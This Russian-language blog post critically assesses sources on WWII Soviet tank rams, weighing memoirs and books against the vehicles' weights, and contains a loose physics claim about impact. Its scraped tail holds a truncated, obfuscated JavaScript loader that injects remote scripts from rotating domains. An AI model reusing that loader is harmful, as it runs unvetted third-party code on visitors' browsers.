Оценка источников о танковых таранах

Танковые тараны – были или миф ?

 

«Для разыскания истины необходимо раз в жизни, насколько это возможно, все поставить под сомнение» Французский философ Рене Декарт

 

Многие из гайдпарковцев в советской школе слышали, что танковое сражение под Прохоровкой сопровождалось множеством танковых таранов. Танковый таран был показан в фильме-сериале Ю. Озерова «Освобождение».

 война, история, Германия, СССР, Курская битва

Кадр из фильма «Огненная дуга» (1968)

 

Согласно Вики танковый таран – «тактический приём танкового боя, предназначенный для выведения из строябронетехники противника путём столкновения. Таран приводит, как правило, к опрокидыванию или обездвиживанию бронетехники (потере гусеницы — в случае танка или САУ)» [1]. Написана эта статья по книге маршала бронетанковых войск Олега Лосика «Немного о танковых таранах».

Памятник боям за Дуклинский перевал в бывшей Чехословакии

Это действительно профессиональный танкист с 1935 г., проживший 97 лет. За операцию «Багратион» он получил звание Героя СССР. Однако в 41 год (с 1956 г.) он стал преподавателем и начальником бронетанковой академии, а маршала получил в 1975 г., когда маршалом становились и другие гражданские (Брежнев, Устинов, Бугаев). Книгу маршал написал в 1996 г., когда ему было уже 81 год [2].

1944 г. Таран английского Шермана и Тигра

Вики (от Лосика) утверждает, что за время войны было совершено 52 – 160 таранов. При этом в боях под Прохоровкой – 20, а за время Курской битвы – 50. Приводятся некоторые примеры.

Редчайшие кадры - танковый таран

Редчайшие кадры - танковый таран

Фото из архива ФРГ

Один из первых танковых таранов  - экипаж лейтенанта Гудзя 22 июня 1941 года в Зап. Украине – КВ-1 (48 тонн) таранил Т-III (20 т). Известны случаи таранов танками бронепоездов и даже железнодорожного состава. Но ссылки даются только на армейские источники. А их считать полностью надежными нельзя.

К примеру, из документов ЦА МО РФ: «Танк Т-34 командира 2-го батальона 181-й бригады 18-го танкового корпуса капитана Скрипкина врезался в строй «Тигров» и подбил два вражеских танка, прежде чем 88-мм снаряд попал в башню его Т-34, а другой пробил боковую броню. Советский танк загорелся, и раненого Скрипкина вытащили из разбитой машины его водитель сержант Николаев и радист Зырянов. Они укрылись в воронке, но все же один из «Тигров» их заметил и двинулся на них. Тогда Николаев и его заряжающий Чернов вновь прыгнули в горящую машину, завели ее и направили прямо на «Тигра». Оба танка при столкновении взорвались». 

Одна из советских картин, героизирующих таран

Однако мемуары Вильгельма Реса тарана не подтверждает. «Внезапно один Т-34 прорвался и двинулся прямо на нас. Наш первый радист стал по одному подавать снаряды мне, чтобы я закладывал их в пушку. В это время наш командир наверху не переставая кричал: «Выстрел! Выстрел!» – потому что танк надвигался все ближе. И только после четвертого – «Выстрел» я услышал: «Слава богу!» 

Потом, спустя какое-то, время мы определили, что Т-34 остановился всего в восьми метрах от нас! Наверху на башне у него, словно отштампованные, были 5-сантиметровые отверстия, расположенные на одинаковом расстоянии друг от друга, как если бы их отмерили циркулем. Боевые порядки сторон перемешались. Наши танкисты успешно поражали врага с близких дистанций, но и сами несли большие потери» [3] 

Монумент под Прохоровкой - две 34-ки таранят

Тигра

Таким образом, статистика таранов, основанная на источниках времен войны, ненадежна.

Есть подтверждение таранов и от ветеранов, рассказывающих о войне уже в постсоветские годы.

В книге А. Драбкина «Я дрался на Т-34» бывший комтанка А. Фадин: «Я обхожу его и, стреляя в никуда, вырываюсь вперед. Только тут увидел впереди, метрах в ста, тяжелую самоходную установку «Фердинанд», которая, упираясь кормой в небольшое каменное строение, контролировала перекресток. Увидев «Фердинанда» и ударив ему в лоб бронебойным снарядом, даю команду Тюрину таранить его. Тюрин приблизился, ударил «Фердинанда» и начал его давить. Экипаж попытался выскочить, но попал под автоматный огонь заряжающего. Четверо остались лежать убитыми на крыше корпуса, однако одному немцу удалось убежать» [4].

изображение

Вот такого монстра "раздавил" Т-34

Возможно и здесь ветеран напутал. САУ «Фердинанд» весит 65 т., имеет 200 мм лобовой и 80 мм боковой брони, а Т-34-85 – 32 т. Высота корпуса «Фердинанда» три метра, а Т-34 – 2,7 м. Как в этом случае «давил» ?

Другие танкисты в этой книге, как и в книге «Я воевал на иномарке» (О «Шермане») о таранах не упоминают.

Из письма ветерана 43-го гв. танкового полка А. X. Гербина: «17 августа 1943 г. началась артподготовка перед вводом корпуса в прорыв. В бой был введен наш полк, и мы пошли в атаку. …..Увлеченные успехом, мы преследовали немцев. Впереди я заметил штабную машину, ринулся за ней и на полном ходу танк сбил ее в кювет. После этого погнался за второй спецмашиной, которая выехала из сада на дорогу. На выручку ей вышел „тигр". Я заметил его в 5 — 8 метрах, когда немного развеялась пыль от машины. В такой обстановке, на скорости 50 км в час, мне ничего не оставалось, как нажать на рычаги и таранить „тигра". После тарана я некоторое время находился без сознания. Очнувшись, заметил свет в танке, услышал стоны раненых лейтенанта и командира орудия. Я растолкал радиста Ваню Высоцкого, и мы стали их спасать.
Когда шли в атаку, то на рычаге зубчатки я поставил „газ", чтобы в случае толчка не заглох мотор. Очнувшись, услышал, что мотор работает, но скорость выключилась от удара, башня с пушкой сдвинулась с корпуса танка. Ноги Яковлева придавило аккумулятором, а командира орудия зажало между корпусом танка и торцом башни.
Чтобы освободить командира орудия, с помощью переключения скоростей я заставил дуло пушки упереться в бронь „тигра" и передвинул башню. Это позволило Ване вытащить командира орудия» [5].

Дальше ветеран рассказывает о том, как пробирались к своим и все умерли, кроме него. А что с Тигром – не говорит. Но ветеран показал, что столкновение 32 т.

с 56 тоннами чревато, прежде всего, для первого.

Из книги М. Барятинского (признанного эксперта по танкам) «Советские танковые асы»: «На размышление, на принятие решения у меня было одно мгновение. Ни промедлить, ни попытаться уйти не было никакой возможности, фашисты расстреляли бы нас в упор. Все это пронеслось в голове молниеносно. И я скомандовал механику-водителю:

— Петя, бей его тараном!

Взревел мотор, Каманов рывком бросил машину на вражеский танк. В это время фашист выстрелил, его снаряд скользнул по нашей башне, вызвал внутри нее сноп искр и рикошетом ушел вверх. И тут последовал сильный удар, заскрежетала сталь по стали. «Тридцатьчетверка» всей своей многотонной массой обрушилась на врага... От удара сорвался с крепления прицел, ослабла гусеница, согнулся ствол лобового пулемета» [7].

Что это был за немецкий танк и что с ним стало – не описывается. Но можно предположить, что это было что-то легче 26 т.-го Т-34 (это осень 1942 г.) – Т-3 (20 т.) или более легкий чешский танк.

Еще случай из книги Барятинского.

«Но машина Горобца, хоть и была подожжена, упорно стремилась уже по Московскому шоссе на восток — к своим! …..Немцы поставили на пути свой легкий танк. Механик-водитель ФЛитовченко успел крикнуть командиру: «Иду на таран! Башня!» Горобец едва успел повернуть башню — и тут же удар. От тарана заглох мотор (!). Водитель на минуту потерял сознание. А немцы уже подбежали, стучали по броне, орали: «Рус! Капут!» Но чудом Ф.Литовченко все же завел двигатель! И танк, набирая скорость, опять пошел на восток» [7].

Это октябрь-1941. Легкий танк, как можно предположить – это Т-2 (10 т.) или чешский (14 т.). И это вызвало потерю сознания экипажа и заглох мотор.

Из книги Барятинского: «14 января 1943 года отличился экипаж танка, в котором находился командир роты старший лейтенант П.Ф. Захарченко. Случилось так, что снаряды в танке кончились, а немецкий танк, приблизившись вплотную, изготовился для открытия огня. Тогда Захарченко принял решение таранить врага.

—  Вперед! — скомандовал он механику-водителю сержанту М.А. Кривко. — Тарань фашистского гада, бей его, Миша, в борт!

Удар! Вражеский танк Pz.III застыл на месте. А «тридцатьчетверка» развернулась и заняла новую позицию. Танкисты осмотрели машину — все в порядке. Но тут донеслись звуки работающего мотора.

— По местам! — скомандовал старший лейтенант. Из переулка на улицу выскочил немецкий танк Т-4.

— Догоняй, Миша! — крикнул Захарченко.

«Тридцатьчетверка» быстро настигла вражеский танк. От сильного удара он свалился в канаву. Через некоторое время из люков стали выпрыгивать немецкие танкисты, намереваясь удрать. Но не вышло, все они были пленены. За этот подвиг П.Ф. Захарченко и М.А. Кривко были награждены орденами Красного Знамени» [7].

Тут полный политэс. Двойной таран за пять минут. Т-34 – без царапины, а Т-3 (20 т.) и Т-4 (25 т., а если модернизированный, то под 30 т.)) – «вдребезги».

М. Барятинский публикует и таран немецкого танка (тип не указан, но это июль-1943) против Т-34: «танк под командованием младшего лейтенанта Андрея Столярова подбил в бою две немецкие САУ, а затем еще два танка. Но и «тридцатьчетверка» Столярова была подожжена. Пятый немецкий танк экипаж Столярова уничтожил таранным ударом, при этом весь экипаж «тридцатьчетверки» погиб» [7].

Еще из книги Барятинского: «Подожгли! Экипаж немецкого танка развернулся и, считая себя победителем короткого боя, пошел в Заньки. Экипаж советского танка принял решение идти на таран. На бешеной скорости Т-34 врезался в немецкий танк. Грохот и треск металла потрясли воздух, а затем раздался взрыв» [7].

По-моему, можно сделать несколько выводов:

– танковые тараны, безусловно, были.  Но это было крайнее средство в безвыходной ситуации или случайность. Маршал БТВ Лосик пишет, что механиков-водителей учили таранам, но ни один танкист у Драбкина это не подтверждает. Он возвел тараны в «тактический примем». Это фантазии старого ветерана

– таранов явно меньше, чем «воспоминаний». Большинство таранов – это мощный импульс (его сила равна v*v), при котором не выдерживает тела экипажа, взрывается боекомплект и топливо. Иными словами – таранить принимают решение только камикадзе

– тараны танками танков в 2-3 раза легче (Тиграми, Пантерами, КВ) оправданы, так как такой танк получает значительно меньший импульс.

– умышленный (не форс-мажорный) таран – это преступление, так как уничтожается и своя техника и экипаж. Спастись экипаж обязан, так как его подготовка и «сыгранность» стоят времени и денег

Как-то так

1) https://ru.wikipedia.org/wiki/%D0%A2%D0%B0%D0%BD%D0%BA%D0%BE%D0%B2%D1%8B%D0%B9_%D1%82%D0%B0%D1%80%D0%B0%D0%BD

2) https://ru.wikipedia.org/wiki/%D0%9B%D0%BE%D1%81%D0%B8%D0%BA,_%D0%9E%D0%BB%D0%B5%D0%B3_%D0%90%D0%BB%D0%B5%D0%BA%D1%81%D0%B0%D0%BD%D0%B4%D1%80%D0%BE%D0%B2%D0%B8%D1%87

3) http://nvo.ng.ru/history/2013-07-05/1_kurskaya_duga.html

4) Драбкин, А. Я дрался на Т-34» Сайт militera.lib.ru

5) http://www.yaplakal.com/forum1/topic524307.html

6) http://tankfront.ru/snipers/tank-taran.html

7) Барятинский М. Советские танковые асы  Сайт милитера

<script type="text/javascript">// </script>

<script type="text/javascript">// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("maxpark.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]></script>